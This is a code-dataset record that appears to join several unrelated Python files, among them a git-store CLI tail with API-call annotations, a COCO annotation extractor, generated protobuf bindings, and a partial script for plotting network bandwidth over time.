git_del = gitStoreDel(git_store, _file, verbose=True)
if sys.argv[1] == 'git-commit':
_file = sys.argv[2]
if not os.access(_file, os.F_OK):
print('Not Found: ' + str(_file))
sys.exit(1)
elif not os.access(_file, os.R_OK):
print('No Access: ' + str(_file))
sys.exit(1)
git_commit = gitStoreCommit(git_store, _file, verbose=True)
if sys.argv[1] == 'git-clear-history':
git_clear_hist = gitStoreClearHistory(git_store, verbose=True)
if sys.argv[1] == 'git-diff':
try: _file = sys.argv[2]
except IndexError: _file = None
git_diff = gitStoreDiff(git_store, _file, verbose=True)
if sys.argv[1] == 'git-init':
git_init = gitStoreInit(git_store)
if sys.argv[1] == 'file-type':
_file = sys.argv[2]
file_type = fileType(_file)
print(file_type)
# git + tegridy
|
[
"os.mkdir",
"subprocess.Popen",
"os.remove",
"os.path.isdir",
"os.path.dirname",
"os.path.exists",
"os.path.isfile",
"os.link",
"os.access",
"os.chdir",
"sys.exit"
] |
[((2063, 2082), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (2071, 2082), False, 'import os\n'), ((2348, 2377), 'os.path.exists', 'os.path.exists', (['(git_store + f)'], {}), '(git_store + f)\n', (2362, 2377), False, 'import os\n'), ((2602, 2621), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (2610, 2621), False, 'import os\n'), ((2922, 2958), 'subprocess.Popen', 'Popen', (['cmd'], {'stdout': 'PIPE', 'stderr': 'PIPE'}), '(cmd, stdout=PIPE, stderr=PIPE)\n', (2927, 2958), False, 'from subprocess import Popen, PIPE\n'), ((4759, 4778), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (4767, 4778), False, 'import os\n'), ((5254, 5290), 'subprocess.Popen', 'Popen', (['cmd'], {'stdout': 'PIPE', 'stderr': 'PIPE'}), '(cmd, stdout=PIPE, stderr=PIPE)\n', (5259, 5290), False, 'from subprocess import Popen, PIPE\n'), ((144, 168), 'os.path.isdir', 'os.path.isdir', (['git_store'], {}), '(git_store)\n', (157, 168), False, 'import os\n'), ((231, 255), 'os.mkdir', 'os.mkdir', (['git_store', '(493)'], {}), '(git_store, 493)\n', (239, 255), False, 'import os\n'), ((681, 705), 'os.path.isdir', 'os.path.isdir', (['git_store'], {}), '(git_store)\n', (694, 705), False, 'import os\n'), ((768, 792), 'os.mkdir', 'os.mkdir', (['git_store', '(493)'], {}), '(git_store, 493)\n', (776, 792), False, 'import os\n'), ((807, 841), 'os.path.isdir', 'os.path.isdir', (["(git_store + '/.git')"], {}), "(git_store + '/.git')\n", (820, 841), False, 'import os\n'), ((1232, 1251), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (1240, 1251), False, 'import os\n'), ((1403, 1424), 'os.access', 'os.access', (['f', 'os.F_OK'], {}), '(f, os.F_OK)\n', (1412, 1424), False, 'import os\n'), ((2440, 2464), 'os.remove', 'os.remove', (['(git_store + f)'], {}), '(git_store + f)\n', (2449, 2464), False, 'import os\n'), ((3252, 3271), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (3260, 3271), False, 'import os\n'), ((3786, 3805), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (3794, 3805), False, 'import os\n'), ((4318, 4337), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (4326, 4337), False, 'import os\n'), ((6353, 6372), 'os.chdir', 'os.chdir', (['git_store'], {}), '(git_store)\n', (6361, 6372), False, 'import os\n'), ((502, 523), 'os.path.isfile', 'os.path.isfile', (['gfile'], {}), '(gfile)\n', (516, 523), False, 'import os\n'), ((589, 606), 'os.link', 'os.link', (['f', 'gfile'], {}), '(f, gfile)\n', (596, 606), False, 'import os\n'), ((1527, 1548), 'os.access', 'os.access', (['f', 'os.R_OK'], {}), '(f, os.R_OK)\n', (1536, 1548), False, 'import os\n'), ((339, 361), 'os.path.dirname', 'os.path.dirname', (['gfile'], {}), '(gfile)\n', (354, 361), False, 'import os\n'), ((455, 477), 'os.path.dirname', 'os.path.dirname', (['gfile'], {}), '(gfile)\n', (470, 477), False, 'import os\n'), ((7601, 7626), 'os.access', 'os.access', (['_file', 'os.F_OK'], {}), '(_file, os.F_OK)\n', (7610, 7626), False, 'import os\n'), ((7694, 7705), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (7702, 7705), False, 'import sys\n'), ((8271, 8296), 'os.access', 'os.access', (['_file', 'os.F_OK'], {}), '(_file, os.F_OK)\n', (8280, 8296), False, 'import os\n'), ((8364, 8375), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (8372, 8375), False, 'import sys\n'), ((7727, 7752), 'os.access', 'os.access', (['_file', 'os.R_OK'], {}), '(_file, os.R_OK)\n', (7736, 7752), False, 'import os\n'), ((7820, 7831), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (7828, 7831), False, 'import sys\n'), ((8397, 8422), 'os.access', 'os.access', (['_file', 'os.R_OK'], {}), '(_file, os.R_OK)\n', (8406, 8422), False, 'import os\n'), ((8490, 8501), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (8498, 8501), False, 'import sys\n'), ((409, 431), 'os.path.dirname', 'os.path.dirname', (['gfile'], {}), '(gfile)\n', (424, 431), False, 'import os\n')]
|
#!/bin/python
## Script to copy all images used in the minival2014 to a seperate folder (5k images ~800MB)
import json
import shutil
import os
from pprint import pprint
PATH = "/disk/no_backup/mlprak4/adverserial-object-segmentation/data/"
ANNOTATIONS = "annotations/instances_val2014.json"
FILE_NAME = "COCO_val2014_000000083277.jpg"
# Open minival annotations
with open(PATH + ANNOTATIONS) as f:
data = json.load(f)
# Copy info / licenses / type
extract = json.loads("{}")
extract["info"] = data["info"]
extract["licenses"] = data["licenses"]
#extract["type"] = data["type"]
# Extract all image information
extract["images"] = []
image_ids = []
for img in data["images"]:
if img["file_name"] == FILE_NAME:
extract["images"].append(img)
image_ids.append(img["id"])
# Extract all annotations for the images
extract["annotations"] = []
for ann in data["annotations"]:
if ann["image_id"] in image_ids:
extract["annotations"].append(ann)
# Add Categories at bottom
extract["categories"] = data["categories"]
# Write output file
with open("instances_extract.json", "w") as outfile:
json.dump(extract, outfile, indent=4)
print("Annotations for " + str(len(extract["images"])) + " images extracted")
|
[
"json.dump",
"json.load",
"json.loads"
] |
[((467, 483), 'json.loads', 'json.loads', (['"""{}"""'], {}), "('{}')\n", (477, 483), False, 'import json\n'), ((413, 425), 'json.load', 'json.load', (['f'], {}), '(f)\n', (422, 425), False, 'import json\n'), ((1127, 1164), 'json.dump', 'json.dump', (['extract', 'outfile'], {'indent': '(4)'}), '(extract, outfile, indent=4)\n', (1136, 1164), False, 'import json\n')]
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: get_app_deploy_instance.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='get_app_deploy_instance.proto',
package='business',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x1dget_app_deploy_instance.proto\x12\x08\x62usiness\"-\n\x1bGetAppDeployInstanceRequest\x12\x0e\n\x06\x61ppIds\x18\x01 \x01(\t\"\xe4\x01\n\x1cGetAppDeployInstanceResponse\x12\x39\n\x04list\x18\x01 \x03(\x0b\x32+.business.GetAppDeployInstanceResponse.List\x1a\x88\x01\n\x04List\x12\x12\n\ninstanceId\x18\x01 \x01(\t\x12\x11\n\tpackageId\x18\x02 \x01(\t\x12\x11\n\tversionId\x18\x03 \x01(\t\x12\x10\n\x08\x64\x65viceId\x18\x04 \x01(\t\x12\x10\n\x08\x64\x65viceIp\x18\x05 \x01(\t\x12\x13\n\x0binstallPath\x18\x06 \x01(\t\x12\r\n\x05\x61ppId\x18\x07 \x01(\t\"\x8d\x01\n#GetAppDeployInstanceResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12\x34\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32&.business.GetAppDeployInstanceResponseb\x06proto3')
)
_GETAPPDEPLOYINSTANCEREQUEST = _descriptor.Descriptor(
name='GetAppDeployInstanceRequest',
full_name='business.GetAppDeployInstanceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='appIds', full_name='business.GetAppDeployInstanceRequest.appIds', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=43,
serialized_end=88,
)
_GETAPPDEPLOYINSTANCERESPONSE_LIST = _descriptor.Descriptor(
name='List',
full_name='business.GetAppDeployInstanceResponse.List',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='instanceId', full_name='business.GetAppDeployInstanceResponse.List.instanceId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='business.GetAppDeployInstanceResponse.List.packageId', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionId', full_name='business.GetAppDeployInstanceResponse.List.versionId', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='deviceId', full_name='business.GetAppDeployInstanceResponse.List.deviceId', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='deviceIp', full_name='business.GetAppDeployInstanceResponse.List.deviceIp', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='installPath', full_name='business.GetAppDeployInstanceResponse.List.installPath', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='appId', full_name='business.GetAppDeployInstanceResponse.List.appId', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=183,
serialized_end=319,
)
_GETAPPDEPLOYINSTANCERESPONSE = _descriptor.Descriptor(
name='GetAppDeployInstanceResponse',
full_name='business.GetAppDeployInstanceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='list', full_name='business.GetAppDeployInstanceResponse.list', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_GETAPPDEPLOYINSTANCERESPONSE_LIST, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=91,
serialized_end=319,
)
_GETAPPDEPLOYINSTANCERESPONSEWRAPPER = _descriptor.Descriptor(
name='GetAppDeployInstanceResponseWrapper',
full_name='business.GetAppDeployInstanceResponseWrapper',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='business.GetAppDeployInstanceResponseWrapper.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='codeExplain', full_name='business.GetAppDeployInstanceResponseWrapper.codeExplain', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='business.GetAppDeployInstanceResponseWrapper.error', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='business.GetAppDeployInstanceResponseWrapper.data', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=322,
serialized_end=463,
)
_GETAPPDEPLOYINSTANCERESPONSE_LIST.containing_type = _GETAPPDEPLOYINSTANCERESPONSE
_GETAPPDEPLOYINSTANCERESPONSE.fields_by_name['list'].message_type = _GETAPPDEPLOYINSTANCERESPONSE_LIST
_GETAPPDEPLOYINSTANCERESPONSEWRAPPER.fields_by_name['data'].message_type = _GETAPPDEPLOYINSTANCERESPONSE
DESCRIPTOR.message_types_by_name['GetAppDeployInstanceRequest'] = _GETAPPDEPLOYINSTANCEREQUEST
DESCRIPTOR.message_types_by_name['GetAppDeployInstanceResponse'] = _GETAPPDEPLOYINSTANCERESPONSE
DESCRIPTOR.message_types_by_name['GetAppDeployInstanceResponseWrapper'] = _GETAPPDEPLOYINSTANCERESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetAppDeployInstanceRequest = _reflection.GeneratedProtocolMessageType('GetAppDeployInstanceRequest', (_message.Message,), {
'DESCRIPTOR' : _GETAPPDEPLOYINSTANCEREQUEST,
'__module__' : 'get_app_deploy_instance_pb2'
# @@protoc_insertion_point(class_scope:business.GetAppDeployInstanceRequest)
})
_sym_db.RegisterMessage(GetAppDeployInstanceRequest)
GetAppDeployInstanceResponse = _reflection.GeneratedProtocolMessageType('GetAppDeployInstanceResponse', (_message.Message,), {
'List' : _reflection.GeneratedProtocolMessageType('List', (_message.Message,), {
'DESCRIPTOR' : _GETAPPDEPLOYINSTANCERESPONSE_LIST,
'__module__' : 'get_app_deploy_instance_pb2'
# @@protoc_insertion_point(class_scope:business.GetAppDeployInstanceResponse.List)
})
,
'DESCRIPTOR' : _GETAPPDEPLOYINSTANCERESPONSE,
'__module__' : 'get_app_deploy_instance_pb2'
# @@protoc_insertion_point(class_scope:business.GetAppDeployInstanceResponse)
})
_sym_db.RegisterMessage(GetAppDeployInstanceResponse)
_sym_db.RegisterMessage(GetAppDeployInstanceResponse.List)
GetAppDeployInstanceResponseWrapper = _reflection.GeneratedProtocolMessageType('GetAppDeployInstanceResponseWrapper', (_message.Message,), {
'DESCRIPTOR' : _GETAPPDEPLOYINSTANCERESPONSEWRAPPER,
'__module__' : 'get_app_deploy_instance_pb2'
# @@protoc_insertion_point(class_scope:business.GetAppDeployInstanceResponseWrapper)
})
_sym_db.RegisterMessage(GetAppDeployInstanceResponseWrapper)
# @@protoc_insertion_point(module_scope)
|
[
"google.protobuf.symbol_database.Default",
"google.protobuf.descriptor.FieldDescriptor",
"google.protobuf.reflection.GeneratedProtocolMessageType"
] |
[((477, 503), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ([], {}), '()\n', (501, 503), True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((9146, 9338), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""GetAppDeployInstanceRequest"""', '(_message.Message,)', "{'DESCRIPTOR': _GETAPPDEPLOYINSTANCEREQUEST, '__module__':\n 'get_app_deploy_instance_pb2'}"], {}), "('GetAppDeployInstanceRequest', (\n _message.Message,), {'DESCRIPTOR': _GETAPPDEPLOYINSTANCEREQUEST,\n '__module__': 'get_app_deploy_instance_pb2'})\n", (9186, 9338), True, 'from google.protobuf import reflection as _reflection\n'), ((10218, 10429), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""GetAppDeployInstanceResponseWrapper"""', '(_message.Message,)', "{'DESCRIPTOR': _GETAPPDEPLOYINSTANCERESPONSEWRAPPER, '__module__':\n 'get_app_deploy_instance_pb2'}"], {}), "('GetAppDeployInstanceResponseWrapper',\n (_message.Message,), {'DESCRIPTOR':\n _GETAPPDEPLOYINSTANCERESPONSEWRAPPER, '__module__':\n 'get_app_deploy_instance_pb2'})\n", (10258, 10429), True, 'from google.protobuf import reflection as _reflection\n'), ((9612, 9787), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""List"""', '(_message.Message,)', "{'DESCRIPTOR': _GETAPPDEPLOYINSTANCERESPONSE_LIST, '__module__':\n 'get_app_deploy_instance_pb2'}"], {}), "('List', (_message.Message,), {\n 'DESCRIPTOR': _GETAPPDEPLOYINSTANCERESPONSE_LIST, '__module__':\n 'get_app_deploy_instance_pb2'})\n", (9652, 9787), True, 'from google.protobuf import reflection as _reflection\n'), ((5820, 6169), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""list"""', 'full_name': '"""business.GetAppDeployInstanceResponse.list"""', 'index': '(0)', 'number': '(1)', 'type': '(11)', 'cpp_type': '(10)', 'label': '(3)', 'has_default_value': '(False)', 'default_value': '[]', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='list', full_name=\n 'business.GetAppDeployInstanceResponse.list', index=0, number=1, type=\n 11, cpp_type=10, label=3, has_default_value=False, default_value=[],\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (5847, 6169), True, 'from google.protobuf import descriptor as _descriptor\n'), ((6690, 7042), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""code"""', 'full_name': '"""business.GetAppDeployInstanceResponseWrapper.code"""', 'index': '(0)', 'number': '(1)', 'type': '(5)', 'cpp_type': '(1)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='code', full_name=\n 'business.GetAppDeployInstanceResponseWrapper.code', index=0, number=1,\n type=5, cpp_type=1, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (6717, 7042), True, 'from google.protobuf import descriptor as _descriptor\n'), ((7879, 8241), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""data"""', 'full_name': '"""business.GetAppDeployInstanceResponseWrapper.data"""', 'index': '(3)', 'number': '(4)', 'type': '(11)', 'cpp_type': '(10)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': 'None', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='data', full_name=\n 'business.GetAppDeployInstanceResponseWrapper.data', index=3, number=4,\n type=11, cpp_type=10, label=1, has_default_value=False, default_value=\n None, message_type=None, enum_type=None, containing_type=None,\n is_extension=False, extension_scope=None, serialized_options=None, file\n =DESCRIPTOR)\n", (7906, 8241), True, 'from google.protobuf import descriptor as _descriptor\n')]
|
import matplotlib.pyplot as plt
import matplotlib.dates as md
import matplotlib as mpl
import datetime
import numpy as np
from matplotlib.backends.backend_pdf import PdfPages
import numpy as np
import sys
import errno
import os
from collections import OrderedDict
import math
from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, \
readbandwidthvalues_mim_timeplot_usingfixbuckets
_TITLE_SIZE = 14
_TICK_SIZE = 10
_XLABEL_SIZE = 14
_YLABEL_SIZE = 14
_LEGENDYPOS_10LINE = 2.05
_BUCKETSIZE_SEC = 0.5
_BUCKETSIZE_SEC_PORTS = 1
_TIMEPLOT_COLORS=['#F8B195', "#355C7D", '#C06C84', '#F67280', '#99B898', '#A8E6CE', '#E84A5F', '#A7226E',
'#F7DB4F', "#FC913A", "#1bdc9d", "#9c5a4c", "#9c4c84", "#4c999c", '#F8B195', "#355C7D",
'#C06C84', '#F67280', '#99B898', '#A8E6CE', '#F8B195', "#355C7D", '#C06C84', '#F67280',
'#99B898', '#A8E6CE', '#F8B195', "#355C7D", '#C06C84', '#F67280', '#99B898', '#A8E6CE',
'#F8B195', "#355C7D", '#C06C84', '#F67280', '#99B898', '#A8E6CE']
_FRAGMENTQUALITY_COLORS={"index":"#e48873", "audio":'#21409a', "low":"#f44546", "mid":'#e68a00', "high":"#039c4b"}
_TIMEPLOT_MARKERS = [".", "o", "v", "^", "<", ">", "1", "2", "3", "4", "8", "s", "p", "P", "*", "h", "H",
"+", "x", "X", "D", "d", "|", "_", 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
def getclientnumberlist(config_parser, section, conntype):
return config_parser.get(section, "clientnumber_passive" + conntype).split(",")
def getdashfilelist(config_parser, section):
return config_parser.get(section, "dashfiles").split(",")
def getnoiselist(config_parser, section):
return config_parser.get(section, "noise").split(",")
def createfolder(directoryname):
try:
os.makedirs(directoryname)
except OSError as error:
if error.errno != errno.EEXIST:
print (error)
sys.exit(0)
def passivetimeseries_createplot(plottitle, nclient):
fig = plt.figure(figsize=(15,0.6 * nclient))
ax = plt.gca()
ax.tick_params(axis="both", labelsize=_TICK_SIZE)
ax.set_xlabel("Time", fontsize=_XLABEL_SIZE)
ax.set_ylabel("Bandwidth ()Mbps)", fontsize=_YLABEL_SIZE)
plt.title(plottitle + "___" + str(datetime.datetime.now()))
print("plotting " + plottitle + "___" + str(datetime.datetime.now()) + "...")
plt.gcf().autofmt_xdate()
formatter = "%H:%M:%S"
xfmt = md.DateFormatter(formatter)
ax.xaxis.set_major_formatter(xfmt)
return plt
def passivetimeseries_plot(plt, results, title, folderpath):
legendlabels = []
ytick_labels = []
ytick_positions = []
i = 0
for clientIP, clientresults in results.items():
times = []
ypos = []
#first_timestamp = None
for elem in clientresults:
'''if first_timestamp == None:
times.append (elem["timestamp"] + datetime.timedelta(seconds=_BUCKETSIZE_SEC/2))
ypos.append(i)
first_timestamp = elem["timestamp"]
continue
if (elem["timestamp"] - first_timestamp).total_seconds() < _BUCKETSIZE_SEC:
continue '''
times.append(elem["timestamp"] )# + datetime.timedelta(seconds=_BUCKETSIZE_SEC/2))
ypos.append(i)
#first_timestamp = elem["timestamp"]
plt.plot(times, ypos, marker =_TIMEPLOT_MARKERS[i], linestyle="None", label=clientIP, color=_TIMEPLOT_COLORS[i])
ytick_labels.append(clientIP)
ytick_positions.append(i)
legendlabels.append(clientIP)
i += 1
plt.yticks(ytick_positions, ytick_labels)
createfolder(folderpath)
pdfpage = PdfPages(folderpath + title + ".pdf")
pdfpage.savefig( bbox_inches="tight")
pdfpage.close()
plt.savefig(folderpath + title + ".png", bbox_inches="tight")
plt.close()
def passivetimeseries(config_parser, section, mode, direction, connectiontype, ylim, server, ncol,
legendypos, logger): #edgeserver=edge/cloud
clientnumberlist = getclientnumberlist(config_parser=config_parser, section=section, conntype=connectiontype)
dashfileslist = getdashfilelist(config_parser=config_parser, section=section)
noiselist = getnoiselist(config_parser=config_parser, section=section)
logger.debug("clientnumberlist" + str(clientnumberlist))
logger.debug ("dashfileslist" + str(dashfileslist))
logger.debug ("noiselist" + str(noiselist))
logger.debug("mode = " + mode)
for clientnumber in clientnumberlist:
for noise in noiselist:
for dashfile in dashfileslist:
title = str(mode) + "-" + str(direction) + "-" + str(dashfile) + str(clientnumber) + "-"
title += str(noise) + "-" + str(server) + "_plot1"
filename = "csv/passive/sorted/" + mode + "-bandwidth-" + direction + "-" + connectiontype + "-"
filename += str(clientnumber) + "clients-" + dashfile + "-noise" + noise + "_"
filename += config_parser.get(section, "from_passive") + "-"
filename += config_parser.get(section, "to_passive") + "_SORTED.csv"
folderpath = "time/bandwidth/" + str(connectiontype) + "/"
plt = passivetimeseries_createplot(plottitle = title, nclient=int(clientnumber))
if mode == "self":
ret = readbandwidthvalues_self_timeplot(config_parser=config_parser, section=section,
inputfile=filename, segment=server,
conntype=connectiontype, logger=logger)
elif mode == "mim":
ret = readbandwidthvalues_mim_timeplot(config_parser=config_parser, section=section,
inputfile=filename, segment=server,
conntype=connectiontype, logger=logger)
else:
print("unknown mode " + mode)
print("exiting")
logger.error("unknown mode " + mode)
logger.error("exiting")
sys.exit(0)
passivetimeseries_plot(plt=plt, results=ret, title=title, folderpath=folderpath)
def passivetimeseries_usingbandwidth_createplot(colsnumber, rowsnumber, plottitle):
fig, ax = plt.subplots(ncols = colsnumber, nrows = rowsnumber, squeeze=False)
fig.set_size_inches(8.3 * colsnumber, 1.6 * rowsnumber + 0.5)
#fig.tight_layout()
plt.title(plottitle + "___" + str(datetime.datetime.now()), fontsize=_TITLE_SIZE)
plt.gcf().autofmt_xdate()
formatter = "%H:%M:%S"
xfmt = md.DateFormatter(formatter)
return plt, ax, xfmt
def passivetimeseries_usingbandwidth_plot(results, title, folderpath, ylim, title2="", plotfragmentquality=False):
legendlabels = []
ytick_labels = []
ytick_positions = []
time_min = None
time_max = None
k=0
#xvalues=[]
#yvalues = []
#fragmentqualities = []
#titles =[]
if not plotfragmentquality:
plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=1, plottitle=title,
rowsnumber=len(results))
clientrank=0
for clientIP, clientresults in results.items():
clientrank += 1
if not plotfragmentquality:
times = []
bandwidths = []
else:
times = {"index":[], "audio":[], "low":[], "mid":[], "high":[]}
bandwidths = {"index":[], "audio":[], "low":[], "mid":[], "high":[]}
for elem in clientresults:
if not plotfragmentquality:
times.append (elem["timestamp"])
bandwidths.append(elem["bandwidthMbps"])
elif plotfragmentquality:
fragment_quality=elem["fragmentquality"]
times[fragment_quality].append (elem["timestamp"])
bandwidths[fragment_quality].append(elem["bandwidthMbps"])
if time_min == None:
time_min = elem["timestamp"]
time_max = elem["timestamp"]
if time_min > elem["timestamp"]:
timemin = elem["timestamp"]
if time_max < elem["timestamp"]:
time_max = elem["timestamp"]
#for each sublot
if len(times) != 0:
#ax[k, 0].set_title("client " + str(k + 1) + "- with IP = " + titles[k] + "___" + \
# str(datetime.datetime.now()) + title2)
if title2 != "":
title2 = "_" + title2
if not plotfragmentquality:
ax[k, 0].grid(False)
ax[k, 0].tick_params(axis="both", labelsize=_TICK_SIZE)
ax[k, 0].set_xlabel("t", fontsize=_XLABEL_SIZE)
ax[k, 0].set_ylabel("Mbps", fontsize=_YLABEL_SIZE)
ax[k, 0].set_ylim(0,ylim)
ax[k, 0].set_xlim(time_min,time_max)
ax[k, 0].xaxis.set_major_formatter(xfmt)
ax[k, 0].set_title("client " + str(k + 1) + " with IP = " + clientIP + title2, fontsize=_TITLE_SIZE)
#ax[k, 0].set_title("client " + str(k + 1), fontsize=_TITLE_SIZE)
ax[k, 0].plot(times, bandwidths, marker =_TIMEPLOT_MARKERS[k], markersize=3,
label=clientIP, color=_TIMEPLOT_COLORS[k], linestyle="None")
k += 1
else:
k = 0
plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=1, plottitle=title+clientIP,
rowsnumber=4)
for key, value in times.items():
if key == "index":
continue
print ("Plotting")
print (key)
ax[k, 0].grid(axis="y", color="#dedddc")
ax[k, 0].tick_params(axis="both", labelsize=_TICK_SIZE)
ax[k, 0].set_xlabel("t", fontsize=_XLABEL_SIZE)
ax[k, 0].set_ylabel("Mbps", fontsize=_YLABEL_SIZE)
ax[k, 0].set_ylim(0,ylim)
ax[k, 0].set_xlim(time_min,time_max)
ax[k, 0].xaxis.set_major_formatter(xfmt)
#ax[k, 0].set_title("client " + str(clientrank) + " with IP = " + clientIP + " and quality = " + str(key) + title2 , fontsize=_TITLE_SIZE)
ax[k, 0].set_title("client " + str(clientrank) + " with fragment quality = " + str(key) , fontsize=_TITLE_SIZE)
ax[k, 0].plot(times[key], bandwidths[key], marker =_TIMEPLOT_MARKERS[k], markersize=1,
